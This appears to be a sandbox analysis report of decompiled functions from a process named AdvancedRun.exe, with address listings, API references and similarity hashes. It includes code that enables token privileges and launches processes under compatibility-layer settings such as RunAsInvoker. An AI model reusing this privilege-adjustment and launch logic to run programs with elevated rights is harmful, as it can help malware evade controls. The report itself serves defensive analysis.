				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                        0x00406670
                                                                                                        0x0040667a
                                                                                                        0x00406680
                                                                                                        0x00406686
                                                                                                        0x0040668b
                                                                                                        0x0040668d
                                                                                                        0x00406693
                                                                                                        0x00406699
                                                                                                        0x0040669f
                                                                                                        0x004066a9
                                                                                                        0x004066ac
                                                                                                        0x004066af
                                                                                                        0x004066b9
                                                                                                        0x004066c7
                                                                                                        0x004066d9
                                                                                                        0x004066c9
                                                                                                        0x004066c9
                                                                                                        0x004066cc
                                                                                                        0x004066cf
                                                                                                        0x004066d2
                                                                                                        0x004066d5
                                                                                                        0x004066d5
                                                                                                        0x004066db
                                                                                                        0x004066dd
                                                                                                        0x004066e0
                                                                                                        0x004066e8
                                                                                                        0x004066fa
                                                                                                        0x004066ea
                                                                                                        0x004066ea
                                                                                                        0x004066ed
                                                                                                        0x004066f0
                                                                                                        0x004066f3
                                                                                                        0x004066f6
                                                                                                        0x004066f6
                                                                                                        0x004066fc
                                                                                                        0x004066fe
                                                                                                        0x00406701
                                                                                                        0x00406709
                                                                                                        0x0040671b
                                                                                                        0x0040670b
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00406711
                                                                                                        0x00406714
                                                                                                        0x00406717
                                                                                                        0x00406717
                                                                                                        0x0040671d
                                                                                                        0x0040671f
                                                                                                        0x00406722
                                                                                                        0x0040672a
                                                                                                        0x0040673c
                                                                                                        0x0040672c
                                                                                                        0x0040672c
                                                                                                        0x0040672f
                                                                                                        0x00406732
                                                                                                        0x00406735
                                                                                                        0x00406738
                                                                                                        0x00406738
                                                                                                        0x0040673f
                                                                                                        0x00406745

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1860491036-0
                                                                                                        • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                        • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                        • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                        • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                        0x004054ea
                                                                                                        0x004054ec
                                                                                                        0x004054f1
                                                                                                        0x004054f4
                                                                                                        0x004054f7
                                                                                                        0x004054fa
                                                                                                        0x004054fe
                                                                                                        0x00405501
                                                                                                        0x00405505
                                                                                                        0x00405508
                                                                                                        0x0040550b
                                                                                                        0x0040551b
                                                                                                        0x0040550d
                                                                                                        0x0040550f
                                                                                                        0x0040550f
                                                                                                        0x00405521
                                                                                                        0x00405527
                                                                                                        0x0040552b
                                                                                                        0x0040552e
                                                                                                        0x0040553f
                                                                                                        0x00405530
                                                                                                        0x00405532
                                                                                                        0x00405532
                                                                                                        0x00405556
                                                                                                        0x00405561
                                                                                                        0x0040556e
                                                                                                        0x00405571
                                                                                                        0x00405578
                                                                                                        0x0040557e

                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 004054EC
                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                          • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                          • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                          • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                        • memcpy.MSVCRT ref: 00405556
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 726966127-0
                                                                                                        • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                        • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                        • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                        • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                        0x00405adf
                                                                                                        0x00405ae6
                                                                                                        0x00405af5
                                                                                                        0x00405af6
                                                                                                        0x00405afb
                                                                                                        0x00405b00
                                                                                                        0x00405b0a
                                                                                                        0x00405b18
                                                                                                        0x00405b19
                                                                                                        0x00405b1e
                                                                                                        0x00405b2c
                                                                                                        0x00405b2d
                                                                                                        0x00405b36
                                                                                                        0x00405b37
                                                                                                        0x00405b3c
                                                                                                        0x00405b4a
                                                                                                        0x00405b4b
                                                                                                        0x00405b54
                                                                                                        0x00405b55
                                                                                                        0x00405b5a
                                                                                                        0x00405b68
                                                                                                        0x00405b69
                                                                                                        0x00405b72
                                                                                                        0x00405b73
                                                                                                        0x00405b7b
                                                                                                        0x00000000
                                                                                                        0x00405b7b
                                                                                                        0x00405b80

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1033339047-0
                                                                                                        • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                        • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                        • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                        • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: AdvancedRun.exe PID: 7164 Parent PID: 6924 AdvancedRun.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                        0x00408fc9
                                                                                                        0x00408fd0
                                                                                                        0x00408fe8
                                                                                                        0x00000000
                                                                                                        0x00408fea
                                                                                                        0x00408ff4
                                                                                                        0x00409001
                                                                                                        0x00409003
                                                                                                        0x0040900c
                                                                                                        0x0040900e
                                                                                                        0x00409010
                                                                                                        0x0040901a
                                                                                                        0x0040901a
                                                                                                        0x00409010
                                                                                                        0x0040901f
                                                                                                        0x00409026
                                                                                                        0x0040902d
                                                                                                        0x00409030
                                                                                                        0x00409035
                                                                                                        0x00409037
                                                                                                        0x00409040
                                                                                                        0x00409042
                                                                                                        0x00409044
                                                                                                        0x00409051
                                                                                                        0x00409051
                                                                                                        0x00409044
                                                                                                        0x00409053
                                                                                                        0x0040905e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                          • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                        • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                        • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                        • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                        • API String ID: 616250965-1253513912
                                                                                                        • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                        • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                        • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                        • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                        0x004022d5
                                                                                                        0x004022dd
                                                                                                        0x004022e7
                                                                                                        0x004022ec
                                                                                                        0x004022f7
                                                                                                        0x004022fa
                                                                                                        0x004022fd
                                                                                                        0x00402300
                                                                                                        0x00402307
                                                                                                        0x0040230d
                                                                                                        0x0040230e
                                                                                                        0x00402318
                                                                                                        0x00402321
                                                                                                        0x00402324
                                                                                                        0x00402327
                                                                                                        0x0040232a
                                                                                                        0x0040232d
                                                                                                        0x00402334
                                                                                                        0x00402337
                                                                                                        0x0040233e
                                                                                                        0x0040234f
                                                                                                        0x00402356
                                                                                                        0x0040235b
                                                                                                        0x0040235e
                                                                                                        0x0040236d
                                                                                                        0x00402374
                                                                                                        0x0040237e
                                                                                                        0x00402395
                                                                                                        0x004023a0
                                                                                                        0x004023a0
                                                                                                        0x004023ac
                                                                                                        0x004023cf
                                                                                                        0x004023d2
                                                                                                        0x004023d9
                                                                                                        0x004023de
                                                                                                        0x004023f6
                                                                                                        0x00402403
                                                                                                        0x00402414
                                                                                                        0x00402419
                                                                                                        0x00402403
                                                                                                        0x0040241a
                                                                                                        0x00402423
                                                                                                        0x00402458
                                                                                                        0x0040245d
                                                                                                        0x00402464
                                                                                                        0x00402467
                                                                                                        0x00402468
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402425
                                                                                                        0x00402428
                                                                                                        0x0040242b
                                                                                                        0x00402433
                                                                                                        0x00402434
                                                                                                        0x00402473
                                                                                                        0x00402473
                                                                                                        0x0040247c
                                                                                                        0x00402481
                                                                                                        0x00402488
                                                                                                        0x00402488
                                                                                                        0x00402495
                                                                                                        0x0040249a
                                                                                                        0x004024b7
                                                                                                        0x004024be
                                                                                                        0x004024cd
                                                                                                        0x004024d1
                                                                                                        0x004024ed
                                                                                                        0x004024f0
                                                                                                        0x00402506
                                                                                                        0x0040250b
                                                                                                        0x00402512
                                                                                                        0x00402518
                                                                                                        0x00402519
                                                                                                        0x0040251e
                                                                                                        0x00402524
                                                                                                        0x00402527
                                                                                                        0x0040252b
                                                                                                        0x00402530
                                                                                                        0x00402531
                                                                                                        0x00402531
                                                                                                        0x0040253d
                                                                                                        0x0040255a
                                                                                                        0x00402561
                                                                                                        0x00402570
                                                                                                        0x00402574
                                                                                                        0x00402590
                                                                                                        0x00402593
                                                                                                        0x004025a9
                                                                                                        0x004025ae
                                                                                                        0x004025b5
                                                                                                        0x004025bb
                                                                                                        0x004025bc
                                                                                                        0x004025c1
                                                                                                        0x004025c7
                                                                                                        0x004025ca
                                                                                                        0x004025cd
                                                                                                        0x004025ce
                                                                                                        0x004025d4
                                                                                                        0x004025d4
                                                                                                        0x004025da
                                                                                                        0x004025e3
                                                                                                        0x004025eb
                                                                                                        0x00402633
                                                                                                        0x004025fb
                                                                                                        0x00402608
                                                                                                        0x0040260f
                                                                                                        0x00402614
                                                                                                        0x00402624
                                                                                                        0x00402630
                                                                                                        0x00402630
                                                                                                        0x0040263a
                                                                                                        0x0040263b
                                                                                                        0x00402646
                                                                                                        0x0040264b
                                                                                                        0x0040264c
                                                                                                        0x0040265a
                                                                                                        0x0040265a
                                                                                                        0x0040265d
                                                                                                        0x00402666
                                                                                                        0x00402668
                                                                                                        0x00402668
                                                                                                        0x00402672
                                                                                                        0x00402675
                                                                                                        0x0040267e
                                                                                                        0x0040267e
                                                                                                        0x00402683
                                                                                                        0x0040268b
                                                                                                        0x0040269e
                                                                                                        0x0040269e
                                                                                                        0x004026a3
                                                                                                        0x004026ac
                                                                                                        0x004026b5
                                                                                                        0x004026b8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004026ba
                                                                                                        0x00000000
                                                                                                        0x004026ae
                                                                                                        0x004026ae
                                                                                                        0x004026bf
                                                                                                        0x004026c1
                                                                                                        0x004026c6
                                                                                                        0x004026cc
                                                                                                        0x004026d5
                                                                                                        0x004026db
                                                                                                        0x004026e4
                                                                                                        0x004026ea
                                                                                                        0x004026f3
                                                                                                        0x004026f9
                                                                                                        0x00402707
                                                                                                        0x00402707
                                                                                                        0x0040270d
                                                                                                        0x00402710
                                                                                                        0x0040276d
                                                                                                        0x00402770
                                                                                                        0x0040280b
                                                                                                        0x0040280e
                                                                                                        0x00402813
                                                                                                        0x00402810
                                                                                                        0x00402810
                                                                                                        0x00402810
                                                                                                        0x00402819
                                                                                                        0x0040281f
                                                                                                        0x00402836
                                                                                                        0x00402841
                                                                                                        0x00402846
                                                                                                        0x0040284a
                                                                                                        0x00402851
                                                                                                        0x00402857
                                                                                                        0x00402860
                                                                                                        0x00402865
                                                                                                        0x00402876
                                                                                                        0x00402879
                                                                                                        0x00402888
                                                                                                        0x00402888
                                                                                                        0x00402857
                                                                                                        0x00402891
                                                                                                        0x0040289c
                                                                                                        0x0040289c
                                                                                                        0x00402779
                                                                                                        0x00402784
                                                                                                        0x0040278d
                                                                                                        0x004027a4
                                                                                                        0x004027b3
